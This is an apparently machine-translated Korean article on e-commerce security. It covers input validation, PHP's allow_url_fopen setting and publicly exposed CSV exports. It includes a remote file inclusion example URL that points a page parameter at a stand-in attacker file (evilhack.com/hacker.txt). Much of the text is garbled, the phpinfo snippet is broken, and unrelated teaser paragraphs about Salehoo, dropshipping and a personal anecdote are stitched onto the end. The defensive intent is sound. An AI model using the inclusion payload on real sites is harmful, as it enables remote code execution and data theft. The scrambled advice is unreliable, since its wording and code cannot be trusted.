보안 전자 상거래 웹사이트의 주요 고려되어야 때 개발 전자 상거래 웹사이트 또는 소프트웨어입니다. 개발자는 모든 보안 고려하면 사이트 디자인을 알고 있어야합니다. 전자 상거래와 함께 더 많은 평범한 이들 사이의 보안 공격의 수를 확실히 증가가되었다. 편집증 전자 건강한 것은 우리가 게이트의 보안 문제를 유지할 필요가 전자 상거래 사이트를 개발, 및 우리의 귀와 눈을 뜨고. 비록 다음과 같은 허점, 다음과 같은 경우에는 현재의 심각한 허점을 쉽게 고정됩니다.
아래는 몇 가지 보안 고려 사항 사이트를 개발했을 때 포함될 수있습니다. 이 문서는 전자 좀도둑, 제발 내 별도의 문서를 참조하십시오 커버하지 않습니다.
사용자 입력 - 각 입력 여부 수량으로 진입, 제품을 검색하는 등 이름을 입력 의심 자에 대한 확인이 필요합니다. 만약이 일을하지 않을 경우, PHP의 끝 태그를 닫는 "?>", 입력 가능하고 몇 가지 PHP 코드를 실행합니다.
그것은 지금까지 숫자와 문자는 az (수도있게 포함) 안전하고 0-9 일이 라곤 아무것도 아니라 거기해서는 안의 모든 문자의 목록을 만들어보다. 유효성 검사 스크립트는 각 캐릭터 중 하나를 통해 하나씩 스크롤해야합니다. 이것은 서버측 유효성 검사에 사용하지 자바 스크립트를 달성해야합니다. 를 사용하여 서버측 유효성 검사를 원치 않는 문자 입력을 유지하는 것이 필수적입니다
또 PHP 코드를 실행했을 때 주요있습니다. PHP를 이미 설정은 PHP 스크립트에서 파일을 열 수있게 allow_url_fopen으로 불리는 사용합니다. 절대적으로 필요하지 않으면이 설정을 해제해야합니다.
그냥 둘 다 고정된 머리글과 바닥글에 대한 PHP 스크립트가 있고, 상상 http://www.mysite.com/index.php?page=page2 당신을 입력하여 웹페이지에 액세스할 수있습니다. 모두 그것을 필요로 "을 입력하여 이러한 매개 변수를 수정하여 스크립트를 실행하려면 악의있는 사용자가 http://를 www.mysite.com/index.php?page=http://www.evilhack.com/hacker.txt"입니다 파일에서 PHP 코드의 일부 "hacker.txt". 당신은, PHP는 읽기, 파일 삭제, 중요한 정보가 도난당한 일이 아무것도 가지고있다.
이 설정 또는 해제하시기 바랍니다 텍스트 파일에 다음과 같은 PHP 코드를 복사하면 확실하지 않은 경우 귀하의 웹 서버에 업로드 :
은 phpinfo ();
? "
하면 웹서버에 대한 여러분의 스크립트 액세스를 설정 구성에서 allow_url_fopen을 가로질러 가야 겠어요.
컴퓨터 사용자, 정상적인 상황에서이 설정의 가치를 찾을 수없습니다.
주문처럼 내보낸 데이터의 조심과 MySQL을 CSV 파일에 제품보기. 만약이 데이터를 스크립트에서 내보낸 웹 서버에있는 일반적인 파일 이름 즉, 아래에 보관됩니다. http://www.mysite.com/admin/output_tables.csv. 이것은 정말 할 때 내보낸 데이터 디렉토리에있는 파일에서 공개적으로 액세스할 수있는 문제입니다. 이 보안 허점을 막기 위해 두 가지 방법이있다 - 첫째, 둘째 데이터를 스크립트에 대한 HTML을 텍스트 영역 양식 요소 내부에 위치해야 비밀 번호가 보호 디렉토리 뒤에 출력 파일. 다음 storeowner textfile에서이 정보를 복사하여 자신의 컴퓨터에 붙여넣기하세요 내용은 여기에 새 파일을 만듭니다.
전부 다 걸립니다 전자 상거래 소프트웨어의 데모 사이트와 실제 사이트에 동일한 파일 이름을 찾아 밖으로 체크하여 해당 파일 이름을 찾을 해커입니다.
아래에는 더 많은 기사 "전자 상거래"문서의 범주에서 위 기사와 관련이있습니다.
사람들이 위의 문서에서 "전자 상거래 보안 -"보안 구멍이 공급된 상태에 관심이 또한 관련 기사 아래에 관심이있습니다 :
전자 상거래 사업을 운영하고 당신의 웹사이트를 유지하고 실행에 관한하지 않습니다. 고객이 귀하의 능력을 전화, 팩스, 이메일, 또는 기타 수단을 통해 그들이 봉사에 의존하고, 그리고 귀하의 모든 시스템의 작동이 필요합니다 고객의 요청을 수행하실 수있습니다.
며칠 뒤에 그냥 몇 나는 내 친구와 채팅을하는 데있다. 그는 아기의 제 1 회 생일을 축하했고 동아와 첸나이, 그의 작업 장소에서 자신의 모국어 사이에 실행했다. 그는 자신의 반쪽이 장소를 사이에 여행을 마지막으로 한 달에 적어도 4 번.
만약 당신이 시간의 금액에 대한 전자 상거래 일이 있었나, 당신은 이미 도매 dropship 디렉터리 서비스의 제공자는 정품보다 더 scamers 알려져 가지고있다. 전자의 세계에서 비즈니스, Salehoo 및 월드 와이드 브랜드는 지난 몇 년 동안 인기를 얻고있다는 믿을만한 서비스를 제공합니다.
만약 당신이 온라인으로 유통되지 않았 으면 아마 Salehoo에 대해 이미 들었거나, 심지어는 당신에게 이득을 사용했다. 만약 당신이 당신의 사업을 함께 시작하는 경우 혼합 Salehoo와 혼동 될 수 밖에세요. 자, 우리 모두에 대한 Salehoo 정말 그들은 많은 간과하는 경향이 제공하는 서비스가 무엇인지 살펴 보자.
얼마나 많은 사람들이 당신이 뭔가를 온라인으로 구입한 것을 알고 있느냐? 만약 당신처럼 날 아주 소수, 그 이유는 전자 상거래 세계의 새로운 온라인 쇼핑몰이지. 그러나 이러한 온라인 소매 상점을 운영하는가? 당신과 나처럼 그래서이 사업은 번창하고 지금은 잘 붐 미래로 계속이 사람.
만약 당신이 최신 전자 제품의 열렬한 팬이있습니다, 당신은 자신의 전자 제품 사업을 온라인으로 실행 아이디어에 의해 유혹이 될 수도있습니다. 그것을 시작하면 오른쪽 드롭 다운 전자 서비스 선적을 최대한 활용할 당신이 선택할 수있는 이미 충분한 하드되지 않습니다.
혹시 해당 지역의 편의점에 들어가나요 그리고 만약 당신이 그것을 소유하고 그것을 어떻게 될까요? 당신은 좋은 주인이 될 줄래 당신 같은 사람은? 그럼이 문서가 당신이 자신의 온라인 소매 상점, 또는 일반적으로 알려진 소유의 이점을 보여줍니다 전자 상거래는 실제 지역 편의점에서 다릅니다.
